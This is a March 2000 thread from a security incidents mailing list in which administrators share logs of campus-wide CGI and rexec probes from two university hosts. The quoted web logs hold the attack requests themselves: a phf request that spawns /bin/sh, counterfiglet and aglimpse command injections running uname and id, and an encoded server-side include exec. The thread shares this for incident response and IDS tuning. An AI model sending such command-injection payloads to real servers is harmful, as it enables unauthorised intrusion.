Security Incidents mailing list archives
Re: Scans from udel.edu and tue.nl
From: fernando () BN PT (Fernando Cardoso)
Date: Thu, 23 Mar 2000 09:26:27 -0000
I've seen the same here. Here´s what snort get from the probes. Mar 20 02:55:05 snort: WEB-CGI-TEST-CGIprobe!: 128.175.13.74:48153 -> x.x.x.x:80 Mar 20 05:15:55 snort: WEB-CGI-PHF CGI access attempt: 128.175.13.74:59064 -> x.x.x.x:80 Mar 20 06:11:25 snort: WEB-CGI-Aglimpse CGI access attempt: 128.175.13.74:58311 -> x.x.x.x:80 Mar 21 05:41:16 snort: WEB-CGI-sh: 128.175.13.74:57899 -> x.x.x.x:80 Mar 21 06:25:26 snort: WEB-CGI-query: 128.175.13.74:34372 -> x.x.x.x:80 I've compared this with the web server logs and my snort rulebase only missed a couple probes (counterfiglet and perl). ______________________________________________ Fernando Cardoso Network Administrator National Library of Portugal
-----Original Message----- From: Gregor Sfiligoj [mailto:gregor () TMEDIA IT] Sent: quarta-feira, 22 de Março de 2000 12:39 To: INCIDENTS () SECURITYFOCUS COM Subject: R: Scans from udel.edu and tue.nl I have noted the same from strauss.udel.edu. 128.175.13.74 - - [19/Mar/2000:17:53:24 +0100] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet _};uname%20-a; id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301 128.175.13.74 - - [20/Mar/2000:03:58:47 +0100] "POST /cgi-bin/test-cgi HTTP/1.0" 500 522 128.175.13.74 - - [20/Mar/2000:06:17:50 +0100] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205 128.175.13.74 - - [20/Mar/2000:07:12:58 +0100] "GET /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_ -a\;id;eval$CM D; HTTP/1.0" 404 271 128.175.13.74 - - [21/Mar/2000:01:00:05 +0100] "POST /cgi-bin/perl HTTP/1.0" 404 206 128.175.13.74 - - [21/Mar/2000:06:42:23 +0100] "POST /cgi-bin/sh HTTP/1.0" 404 204 128.175.13.74 - - [21/Mar/2000:07:26:45 +0100] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22 %2F%75%73%72%2 F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207 Are all this covered by arachNIDS library for snort? gregor sfiligoj gregor () tmedia it -----Messaggio originale----- Da: Incidents Mailing List [mailto:INCIDENTS () SECURITYFOCUS COM]Per conto di Jose Nazario Inviato: martedì 21 marzo 2000 17.59 A: INCIDENTS () SECURITYFOCUS COM Oggetto: Scans from udel.edu and tue.nl Hi, [Local hostnames have been munged, outside addresses are real] I wanted to write a quick note to you guys about two sets of web scans we have seen on the CWRU campus these past few days. The first is from the University of Delaware, with some classic cgi-bin attempts: strauss.udel.edu - - [19/Mar/2000:11:41:23 -0500] "GET /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet _};uname%20-a; id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301 strauss.udel.edu - - [19/Mar/2000:21:44:53 -0500] "POST /cgi-bin/test-cgi HTTP/1.0" 404 210 strauss.udel.edu - - [20/Mar/2000:18:47:53 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206 strauss.udel.edu - - [21/Mar/2000:00:31:37 -0500] "POST /cgi-bin/sh HTTP/1.0" 404 204 strauss.udel.edu - - [21/Mar/2000:01:16:06 -0500] "GET /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22 %2F%75%73%72%2 F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207 The second set is from the Netherlands, who just got back to me this morning regarding two comprimised accounts. They also tried some cgi-bin scans to gain access to the machine, as well as some rexec attempts and what appears to be a trojan horse access attempt: webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/perl HTTP/1.0" 404 206 webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205 Mar 19 04:23:04 server kernel: TCP connection rejected from 131.155.69.100, port 5556 Mar 19 05:48:22 server kernel: TCP connection rejected from 131.155.69.100, port 512 Mar 19 08:28:46 server kernel: TCP connection rejected from 131.155.69.100, port 512 And on another machine: Mar 18 23:51:35 4C:workstation rexecd[14591]: refused connect from svstud.win.tue.nl Mar 19 01:03:14 4C:workstation rexecd[14635]: refused connect from svstud.win.tue.nl Mar 19 01:49:15 4C:workstation rexecd[14655]: refused connect from svstud.win.tue.nl Mar 19 04:28:21 4C:workstation rexecd[14731]: refused connect from svstud.win.tue.nl Mar 19 05:36:30 4C:workstation rexecd[14774]: refused connect from svstud.win.tue.nl Mar 19 05:39:34 4C:workstation rexecd[14775]: refused connect from svstud.win.tue.nl Mar 19 08:20:00 4C:workstation rexecd[14857]: refused connect from svstud.win.tue.nl Mar 19 09:23:25 4C:workstation rexecd[14897]: refused connect from svstud.win.tue.nl Both were campus wide probes for web access via cgi-bin and rexecd access (port 512/TCP). It's likely that other readers have seen these problems as well. jose nazario jose () biochemistry cwru edu PGP fingerprint: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80 Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc
Current thread:
- Scans from udel.edu and tue.nl Jose Nazario (Mar 21)
- Re: Scans from udel.edu and tue.nl Alexandru Popa (Mar 22)
- Re: Scans from udel.edu and tue.nl Jose Nazario (Mar 22)
- 8 hours of pinging & POP2 Paul Tero (ME IT) (Mar 22)
- Re: Scans from udel.edu and tue.nl Ryan Russell (Mar 23)
- R: Scans from udel.edu and tue.nl Gregor Sfiligoj (Mar 22)
- Linux Security slam () THEGRID NET (Mar 22)
- Re: Scans from udel.edu and tue.nl Matthew S. Hallacy (Mar 22)
- <Possible follow-ups>
- Re: Scans from udel.edu and tue.nl Fernando Cardoso (Mar 23)
- Re: Scans from udel.edu and tue.nl Ed Padin (Mar 24)
- Re: Scans from udel.edu and tue.nl Alexandru Popa (Mar 22)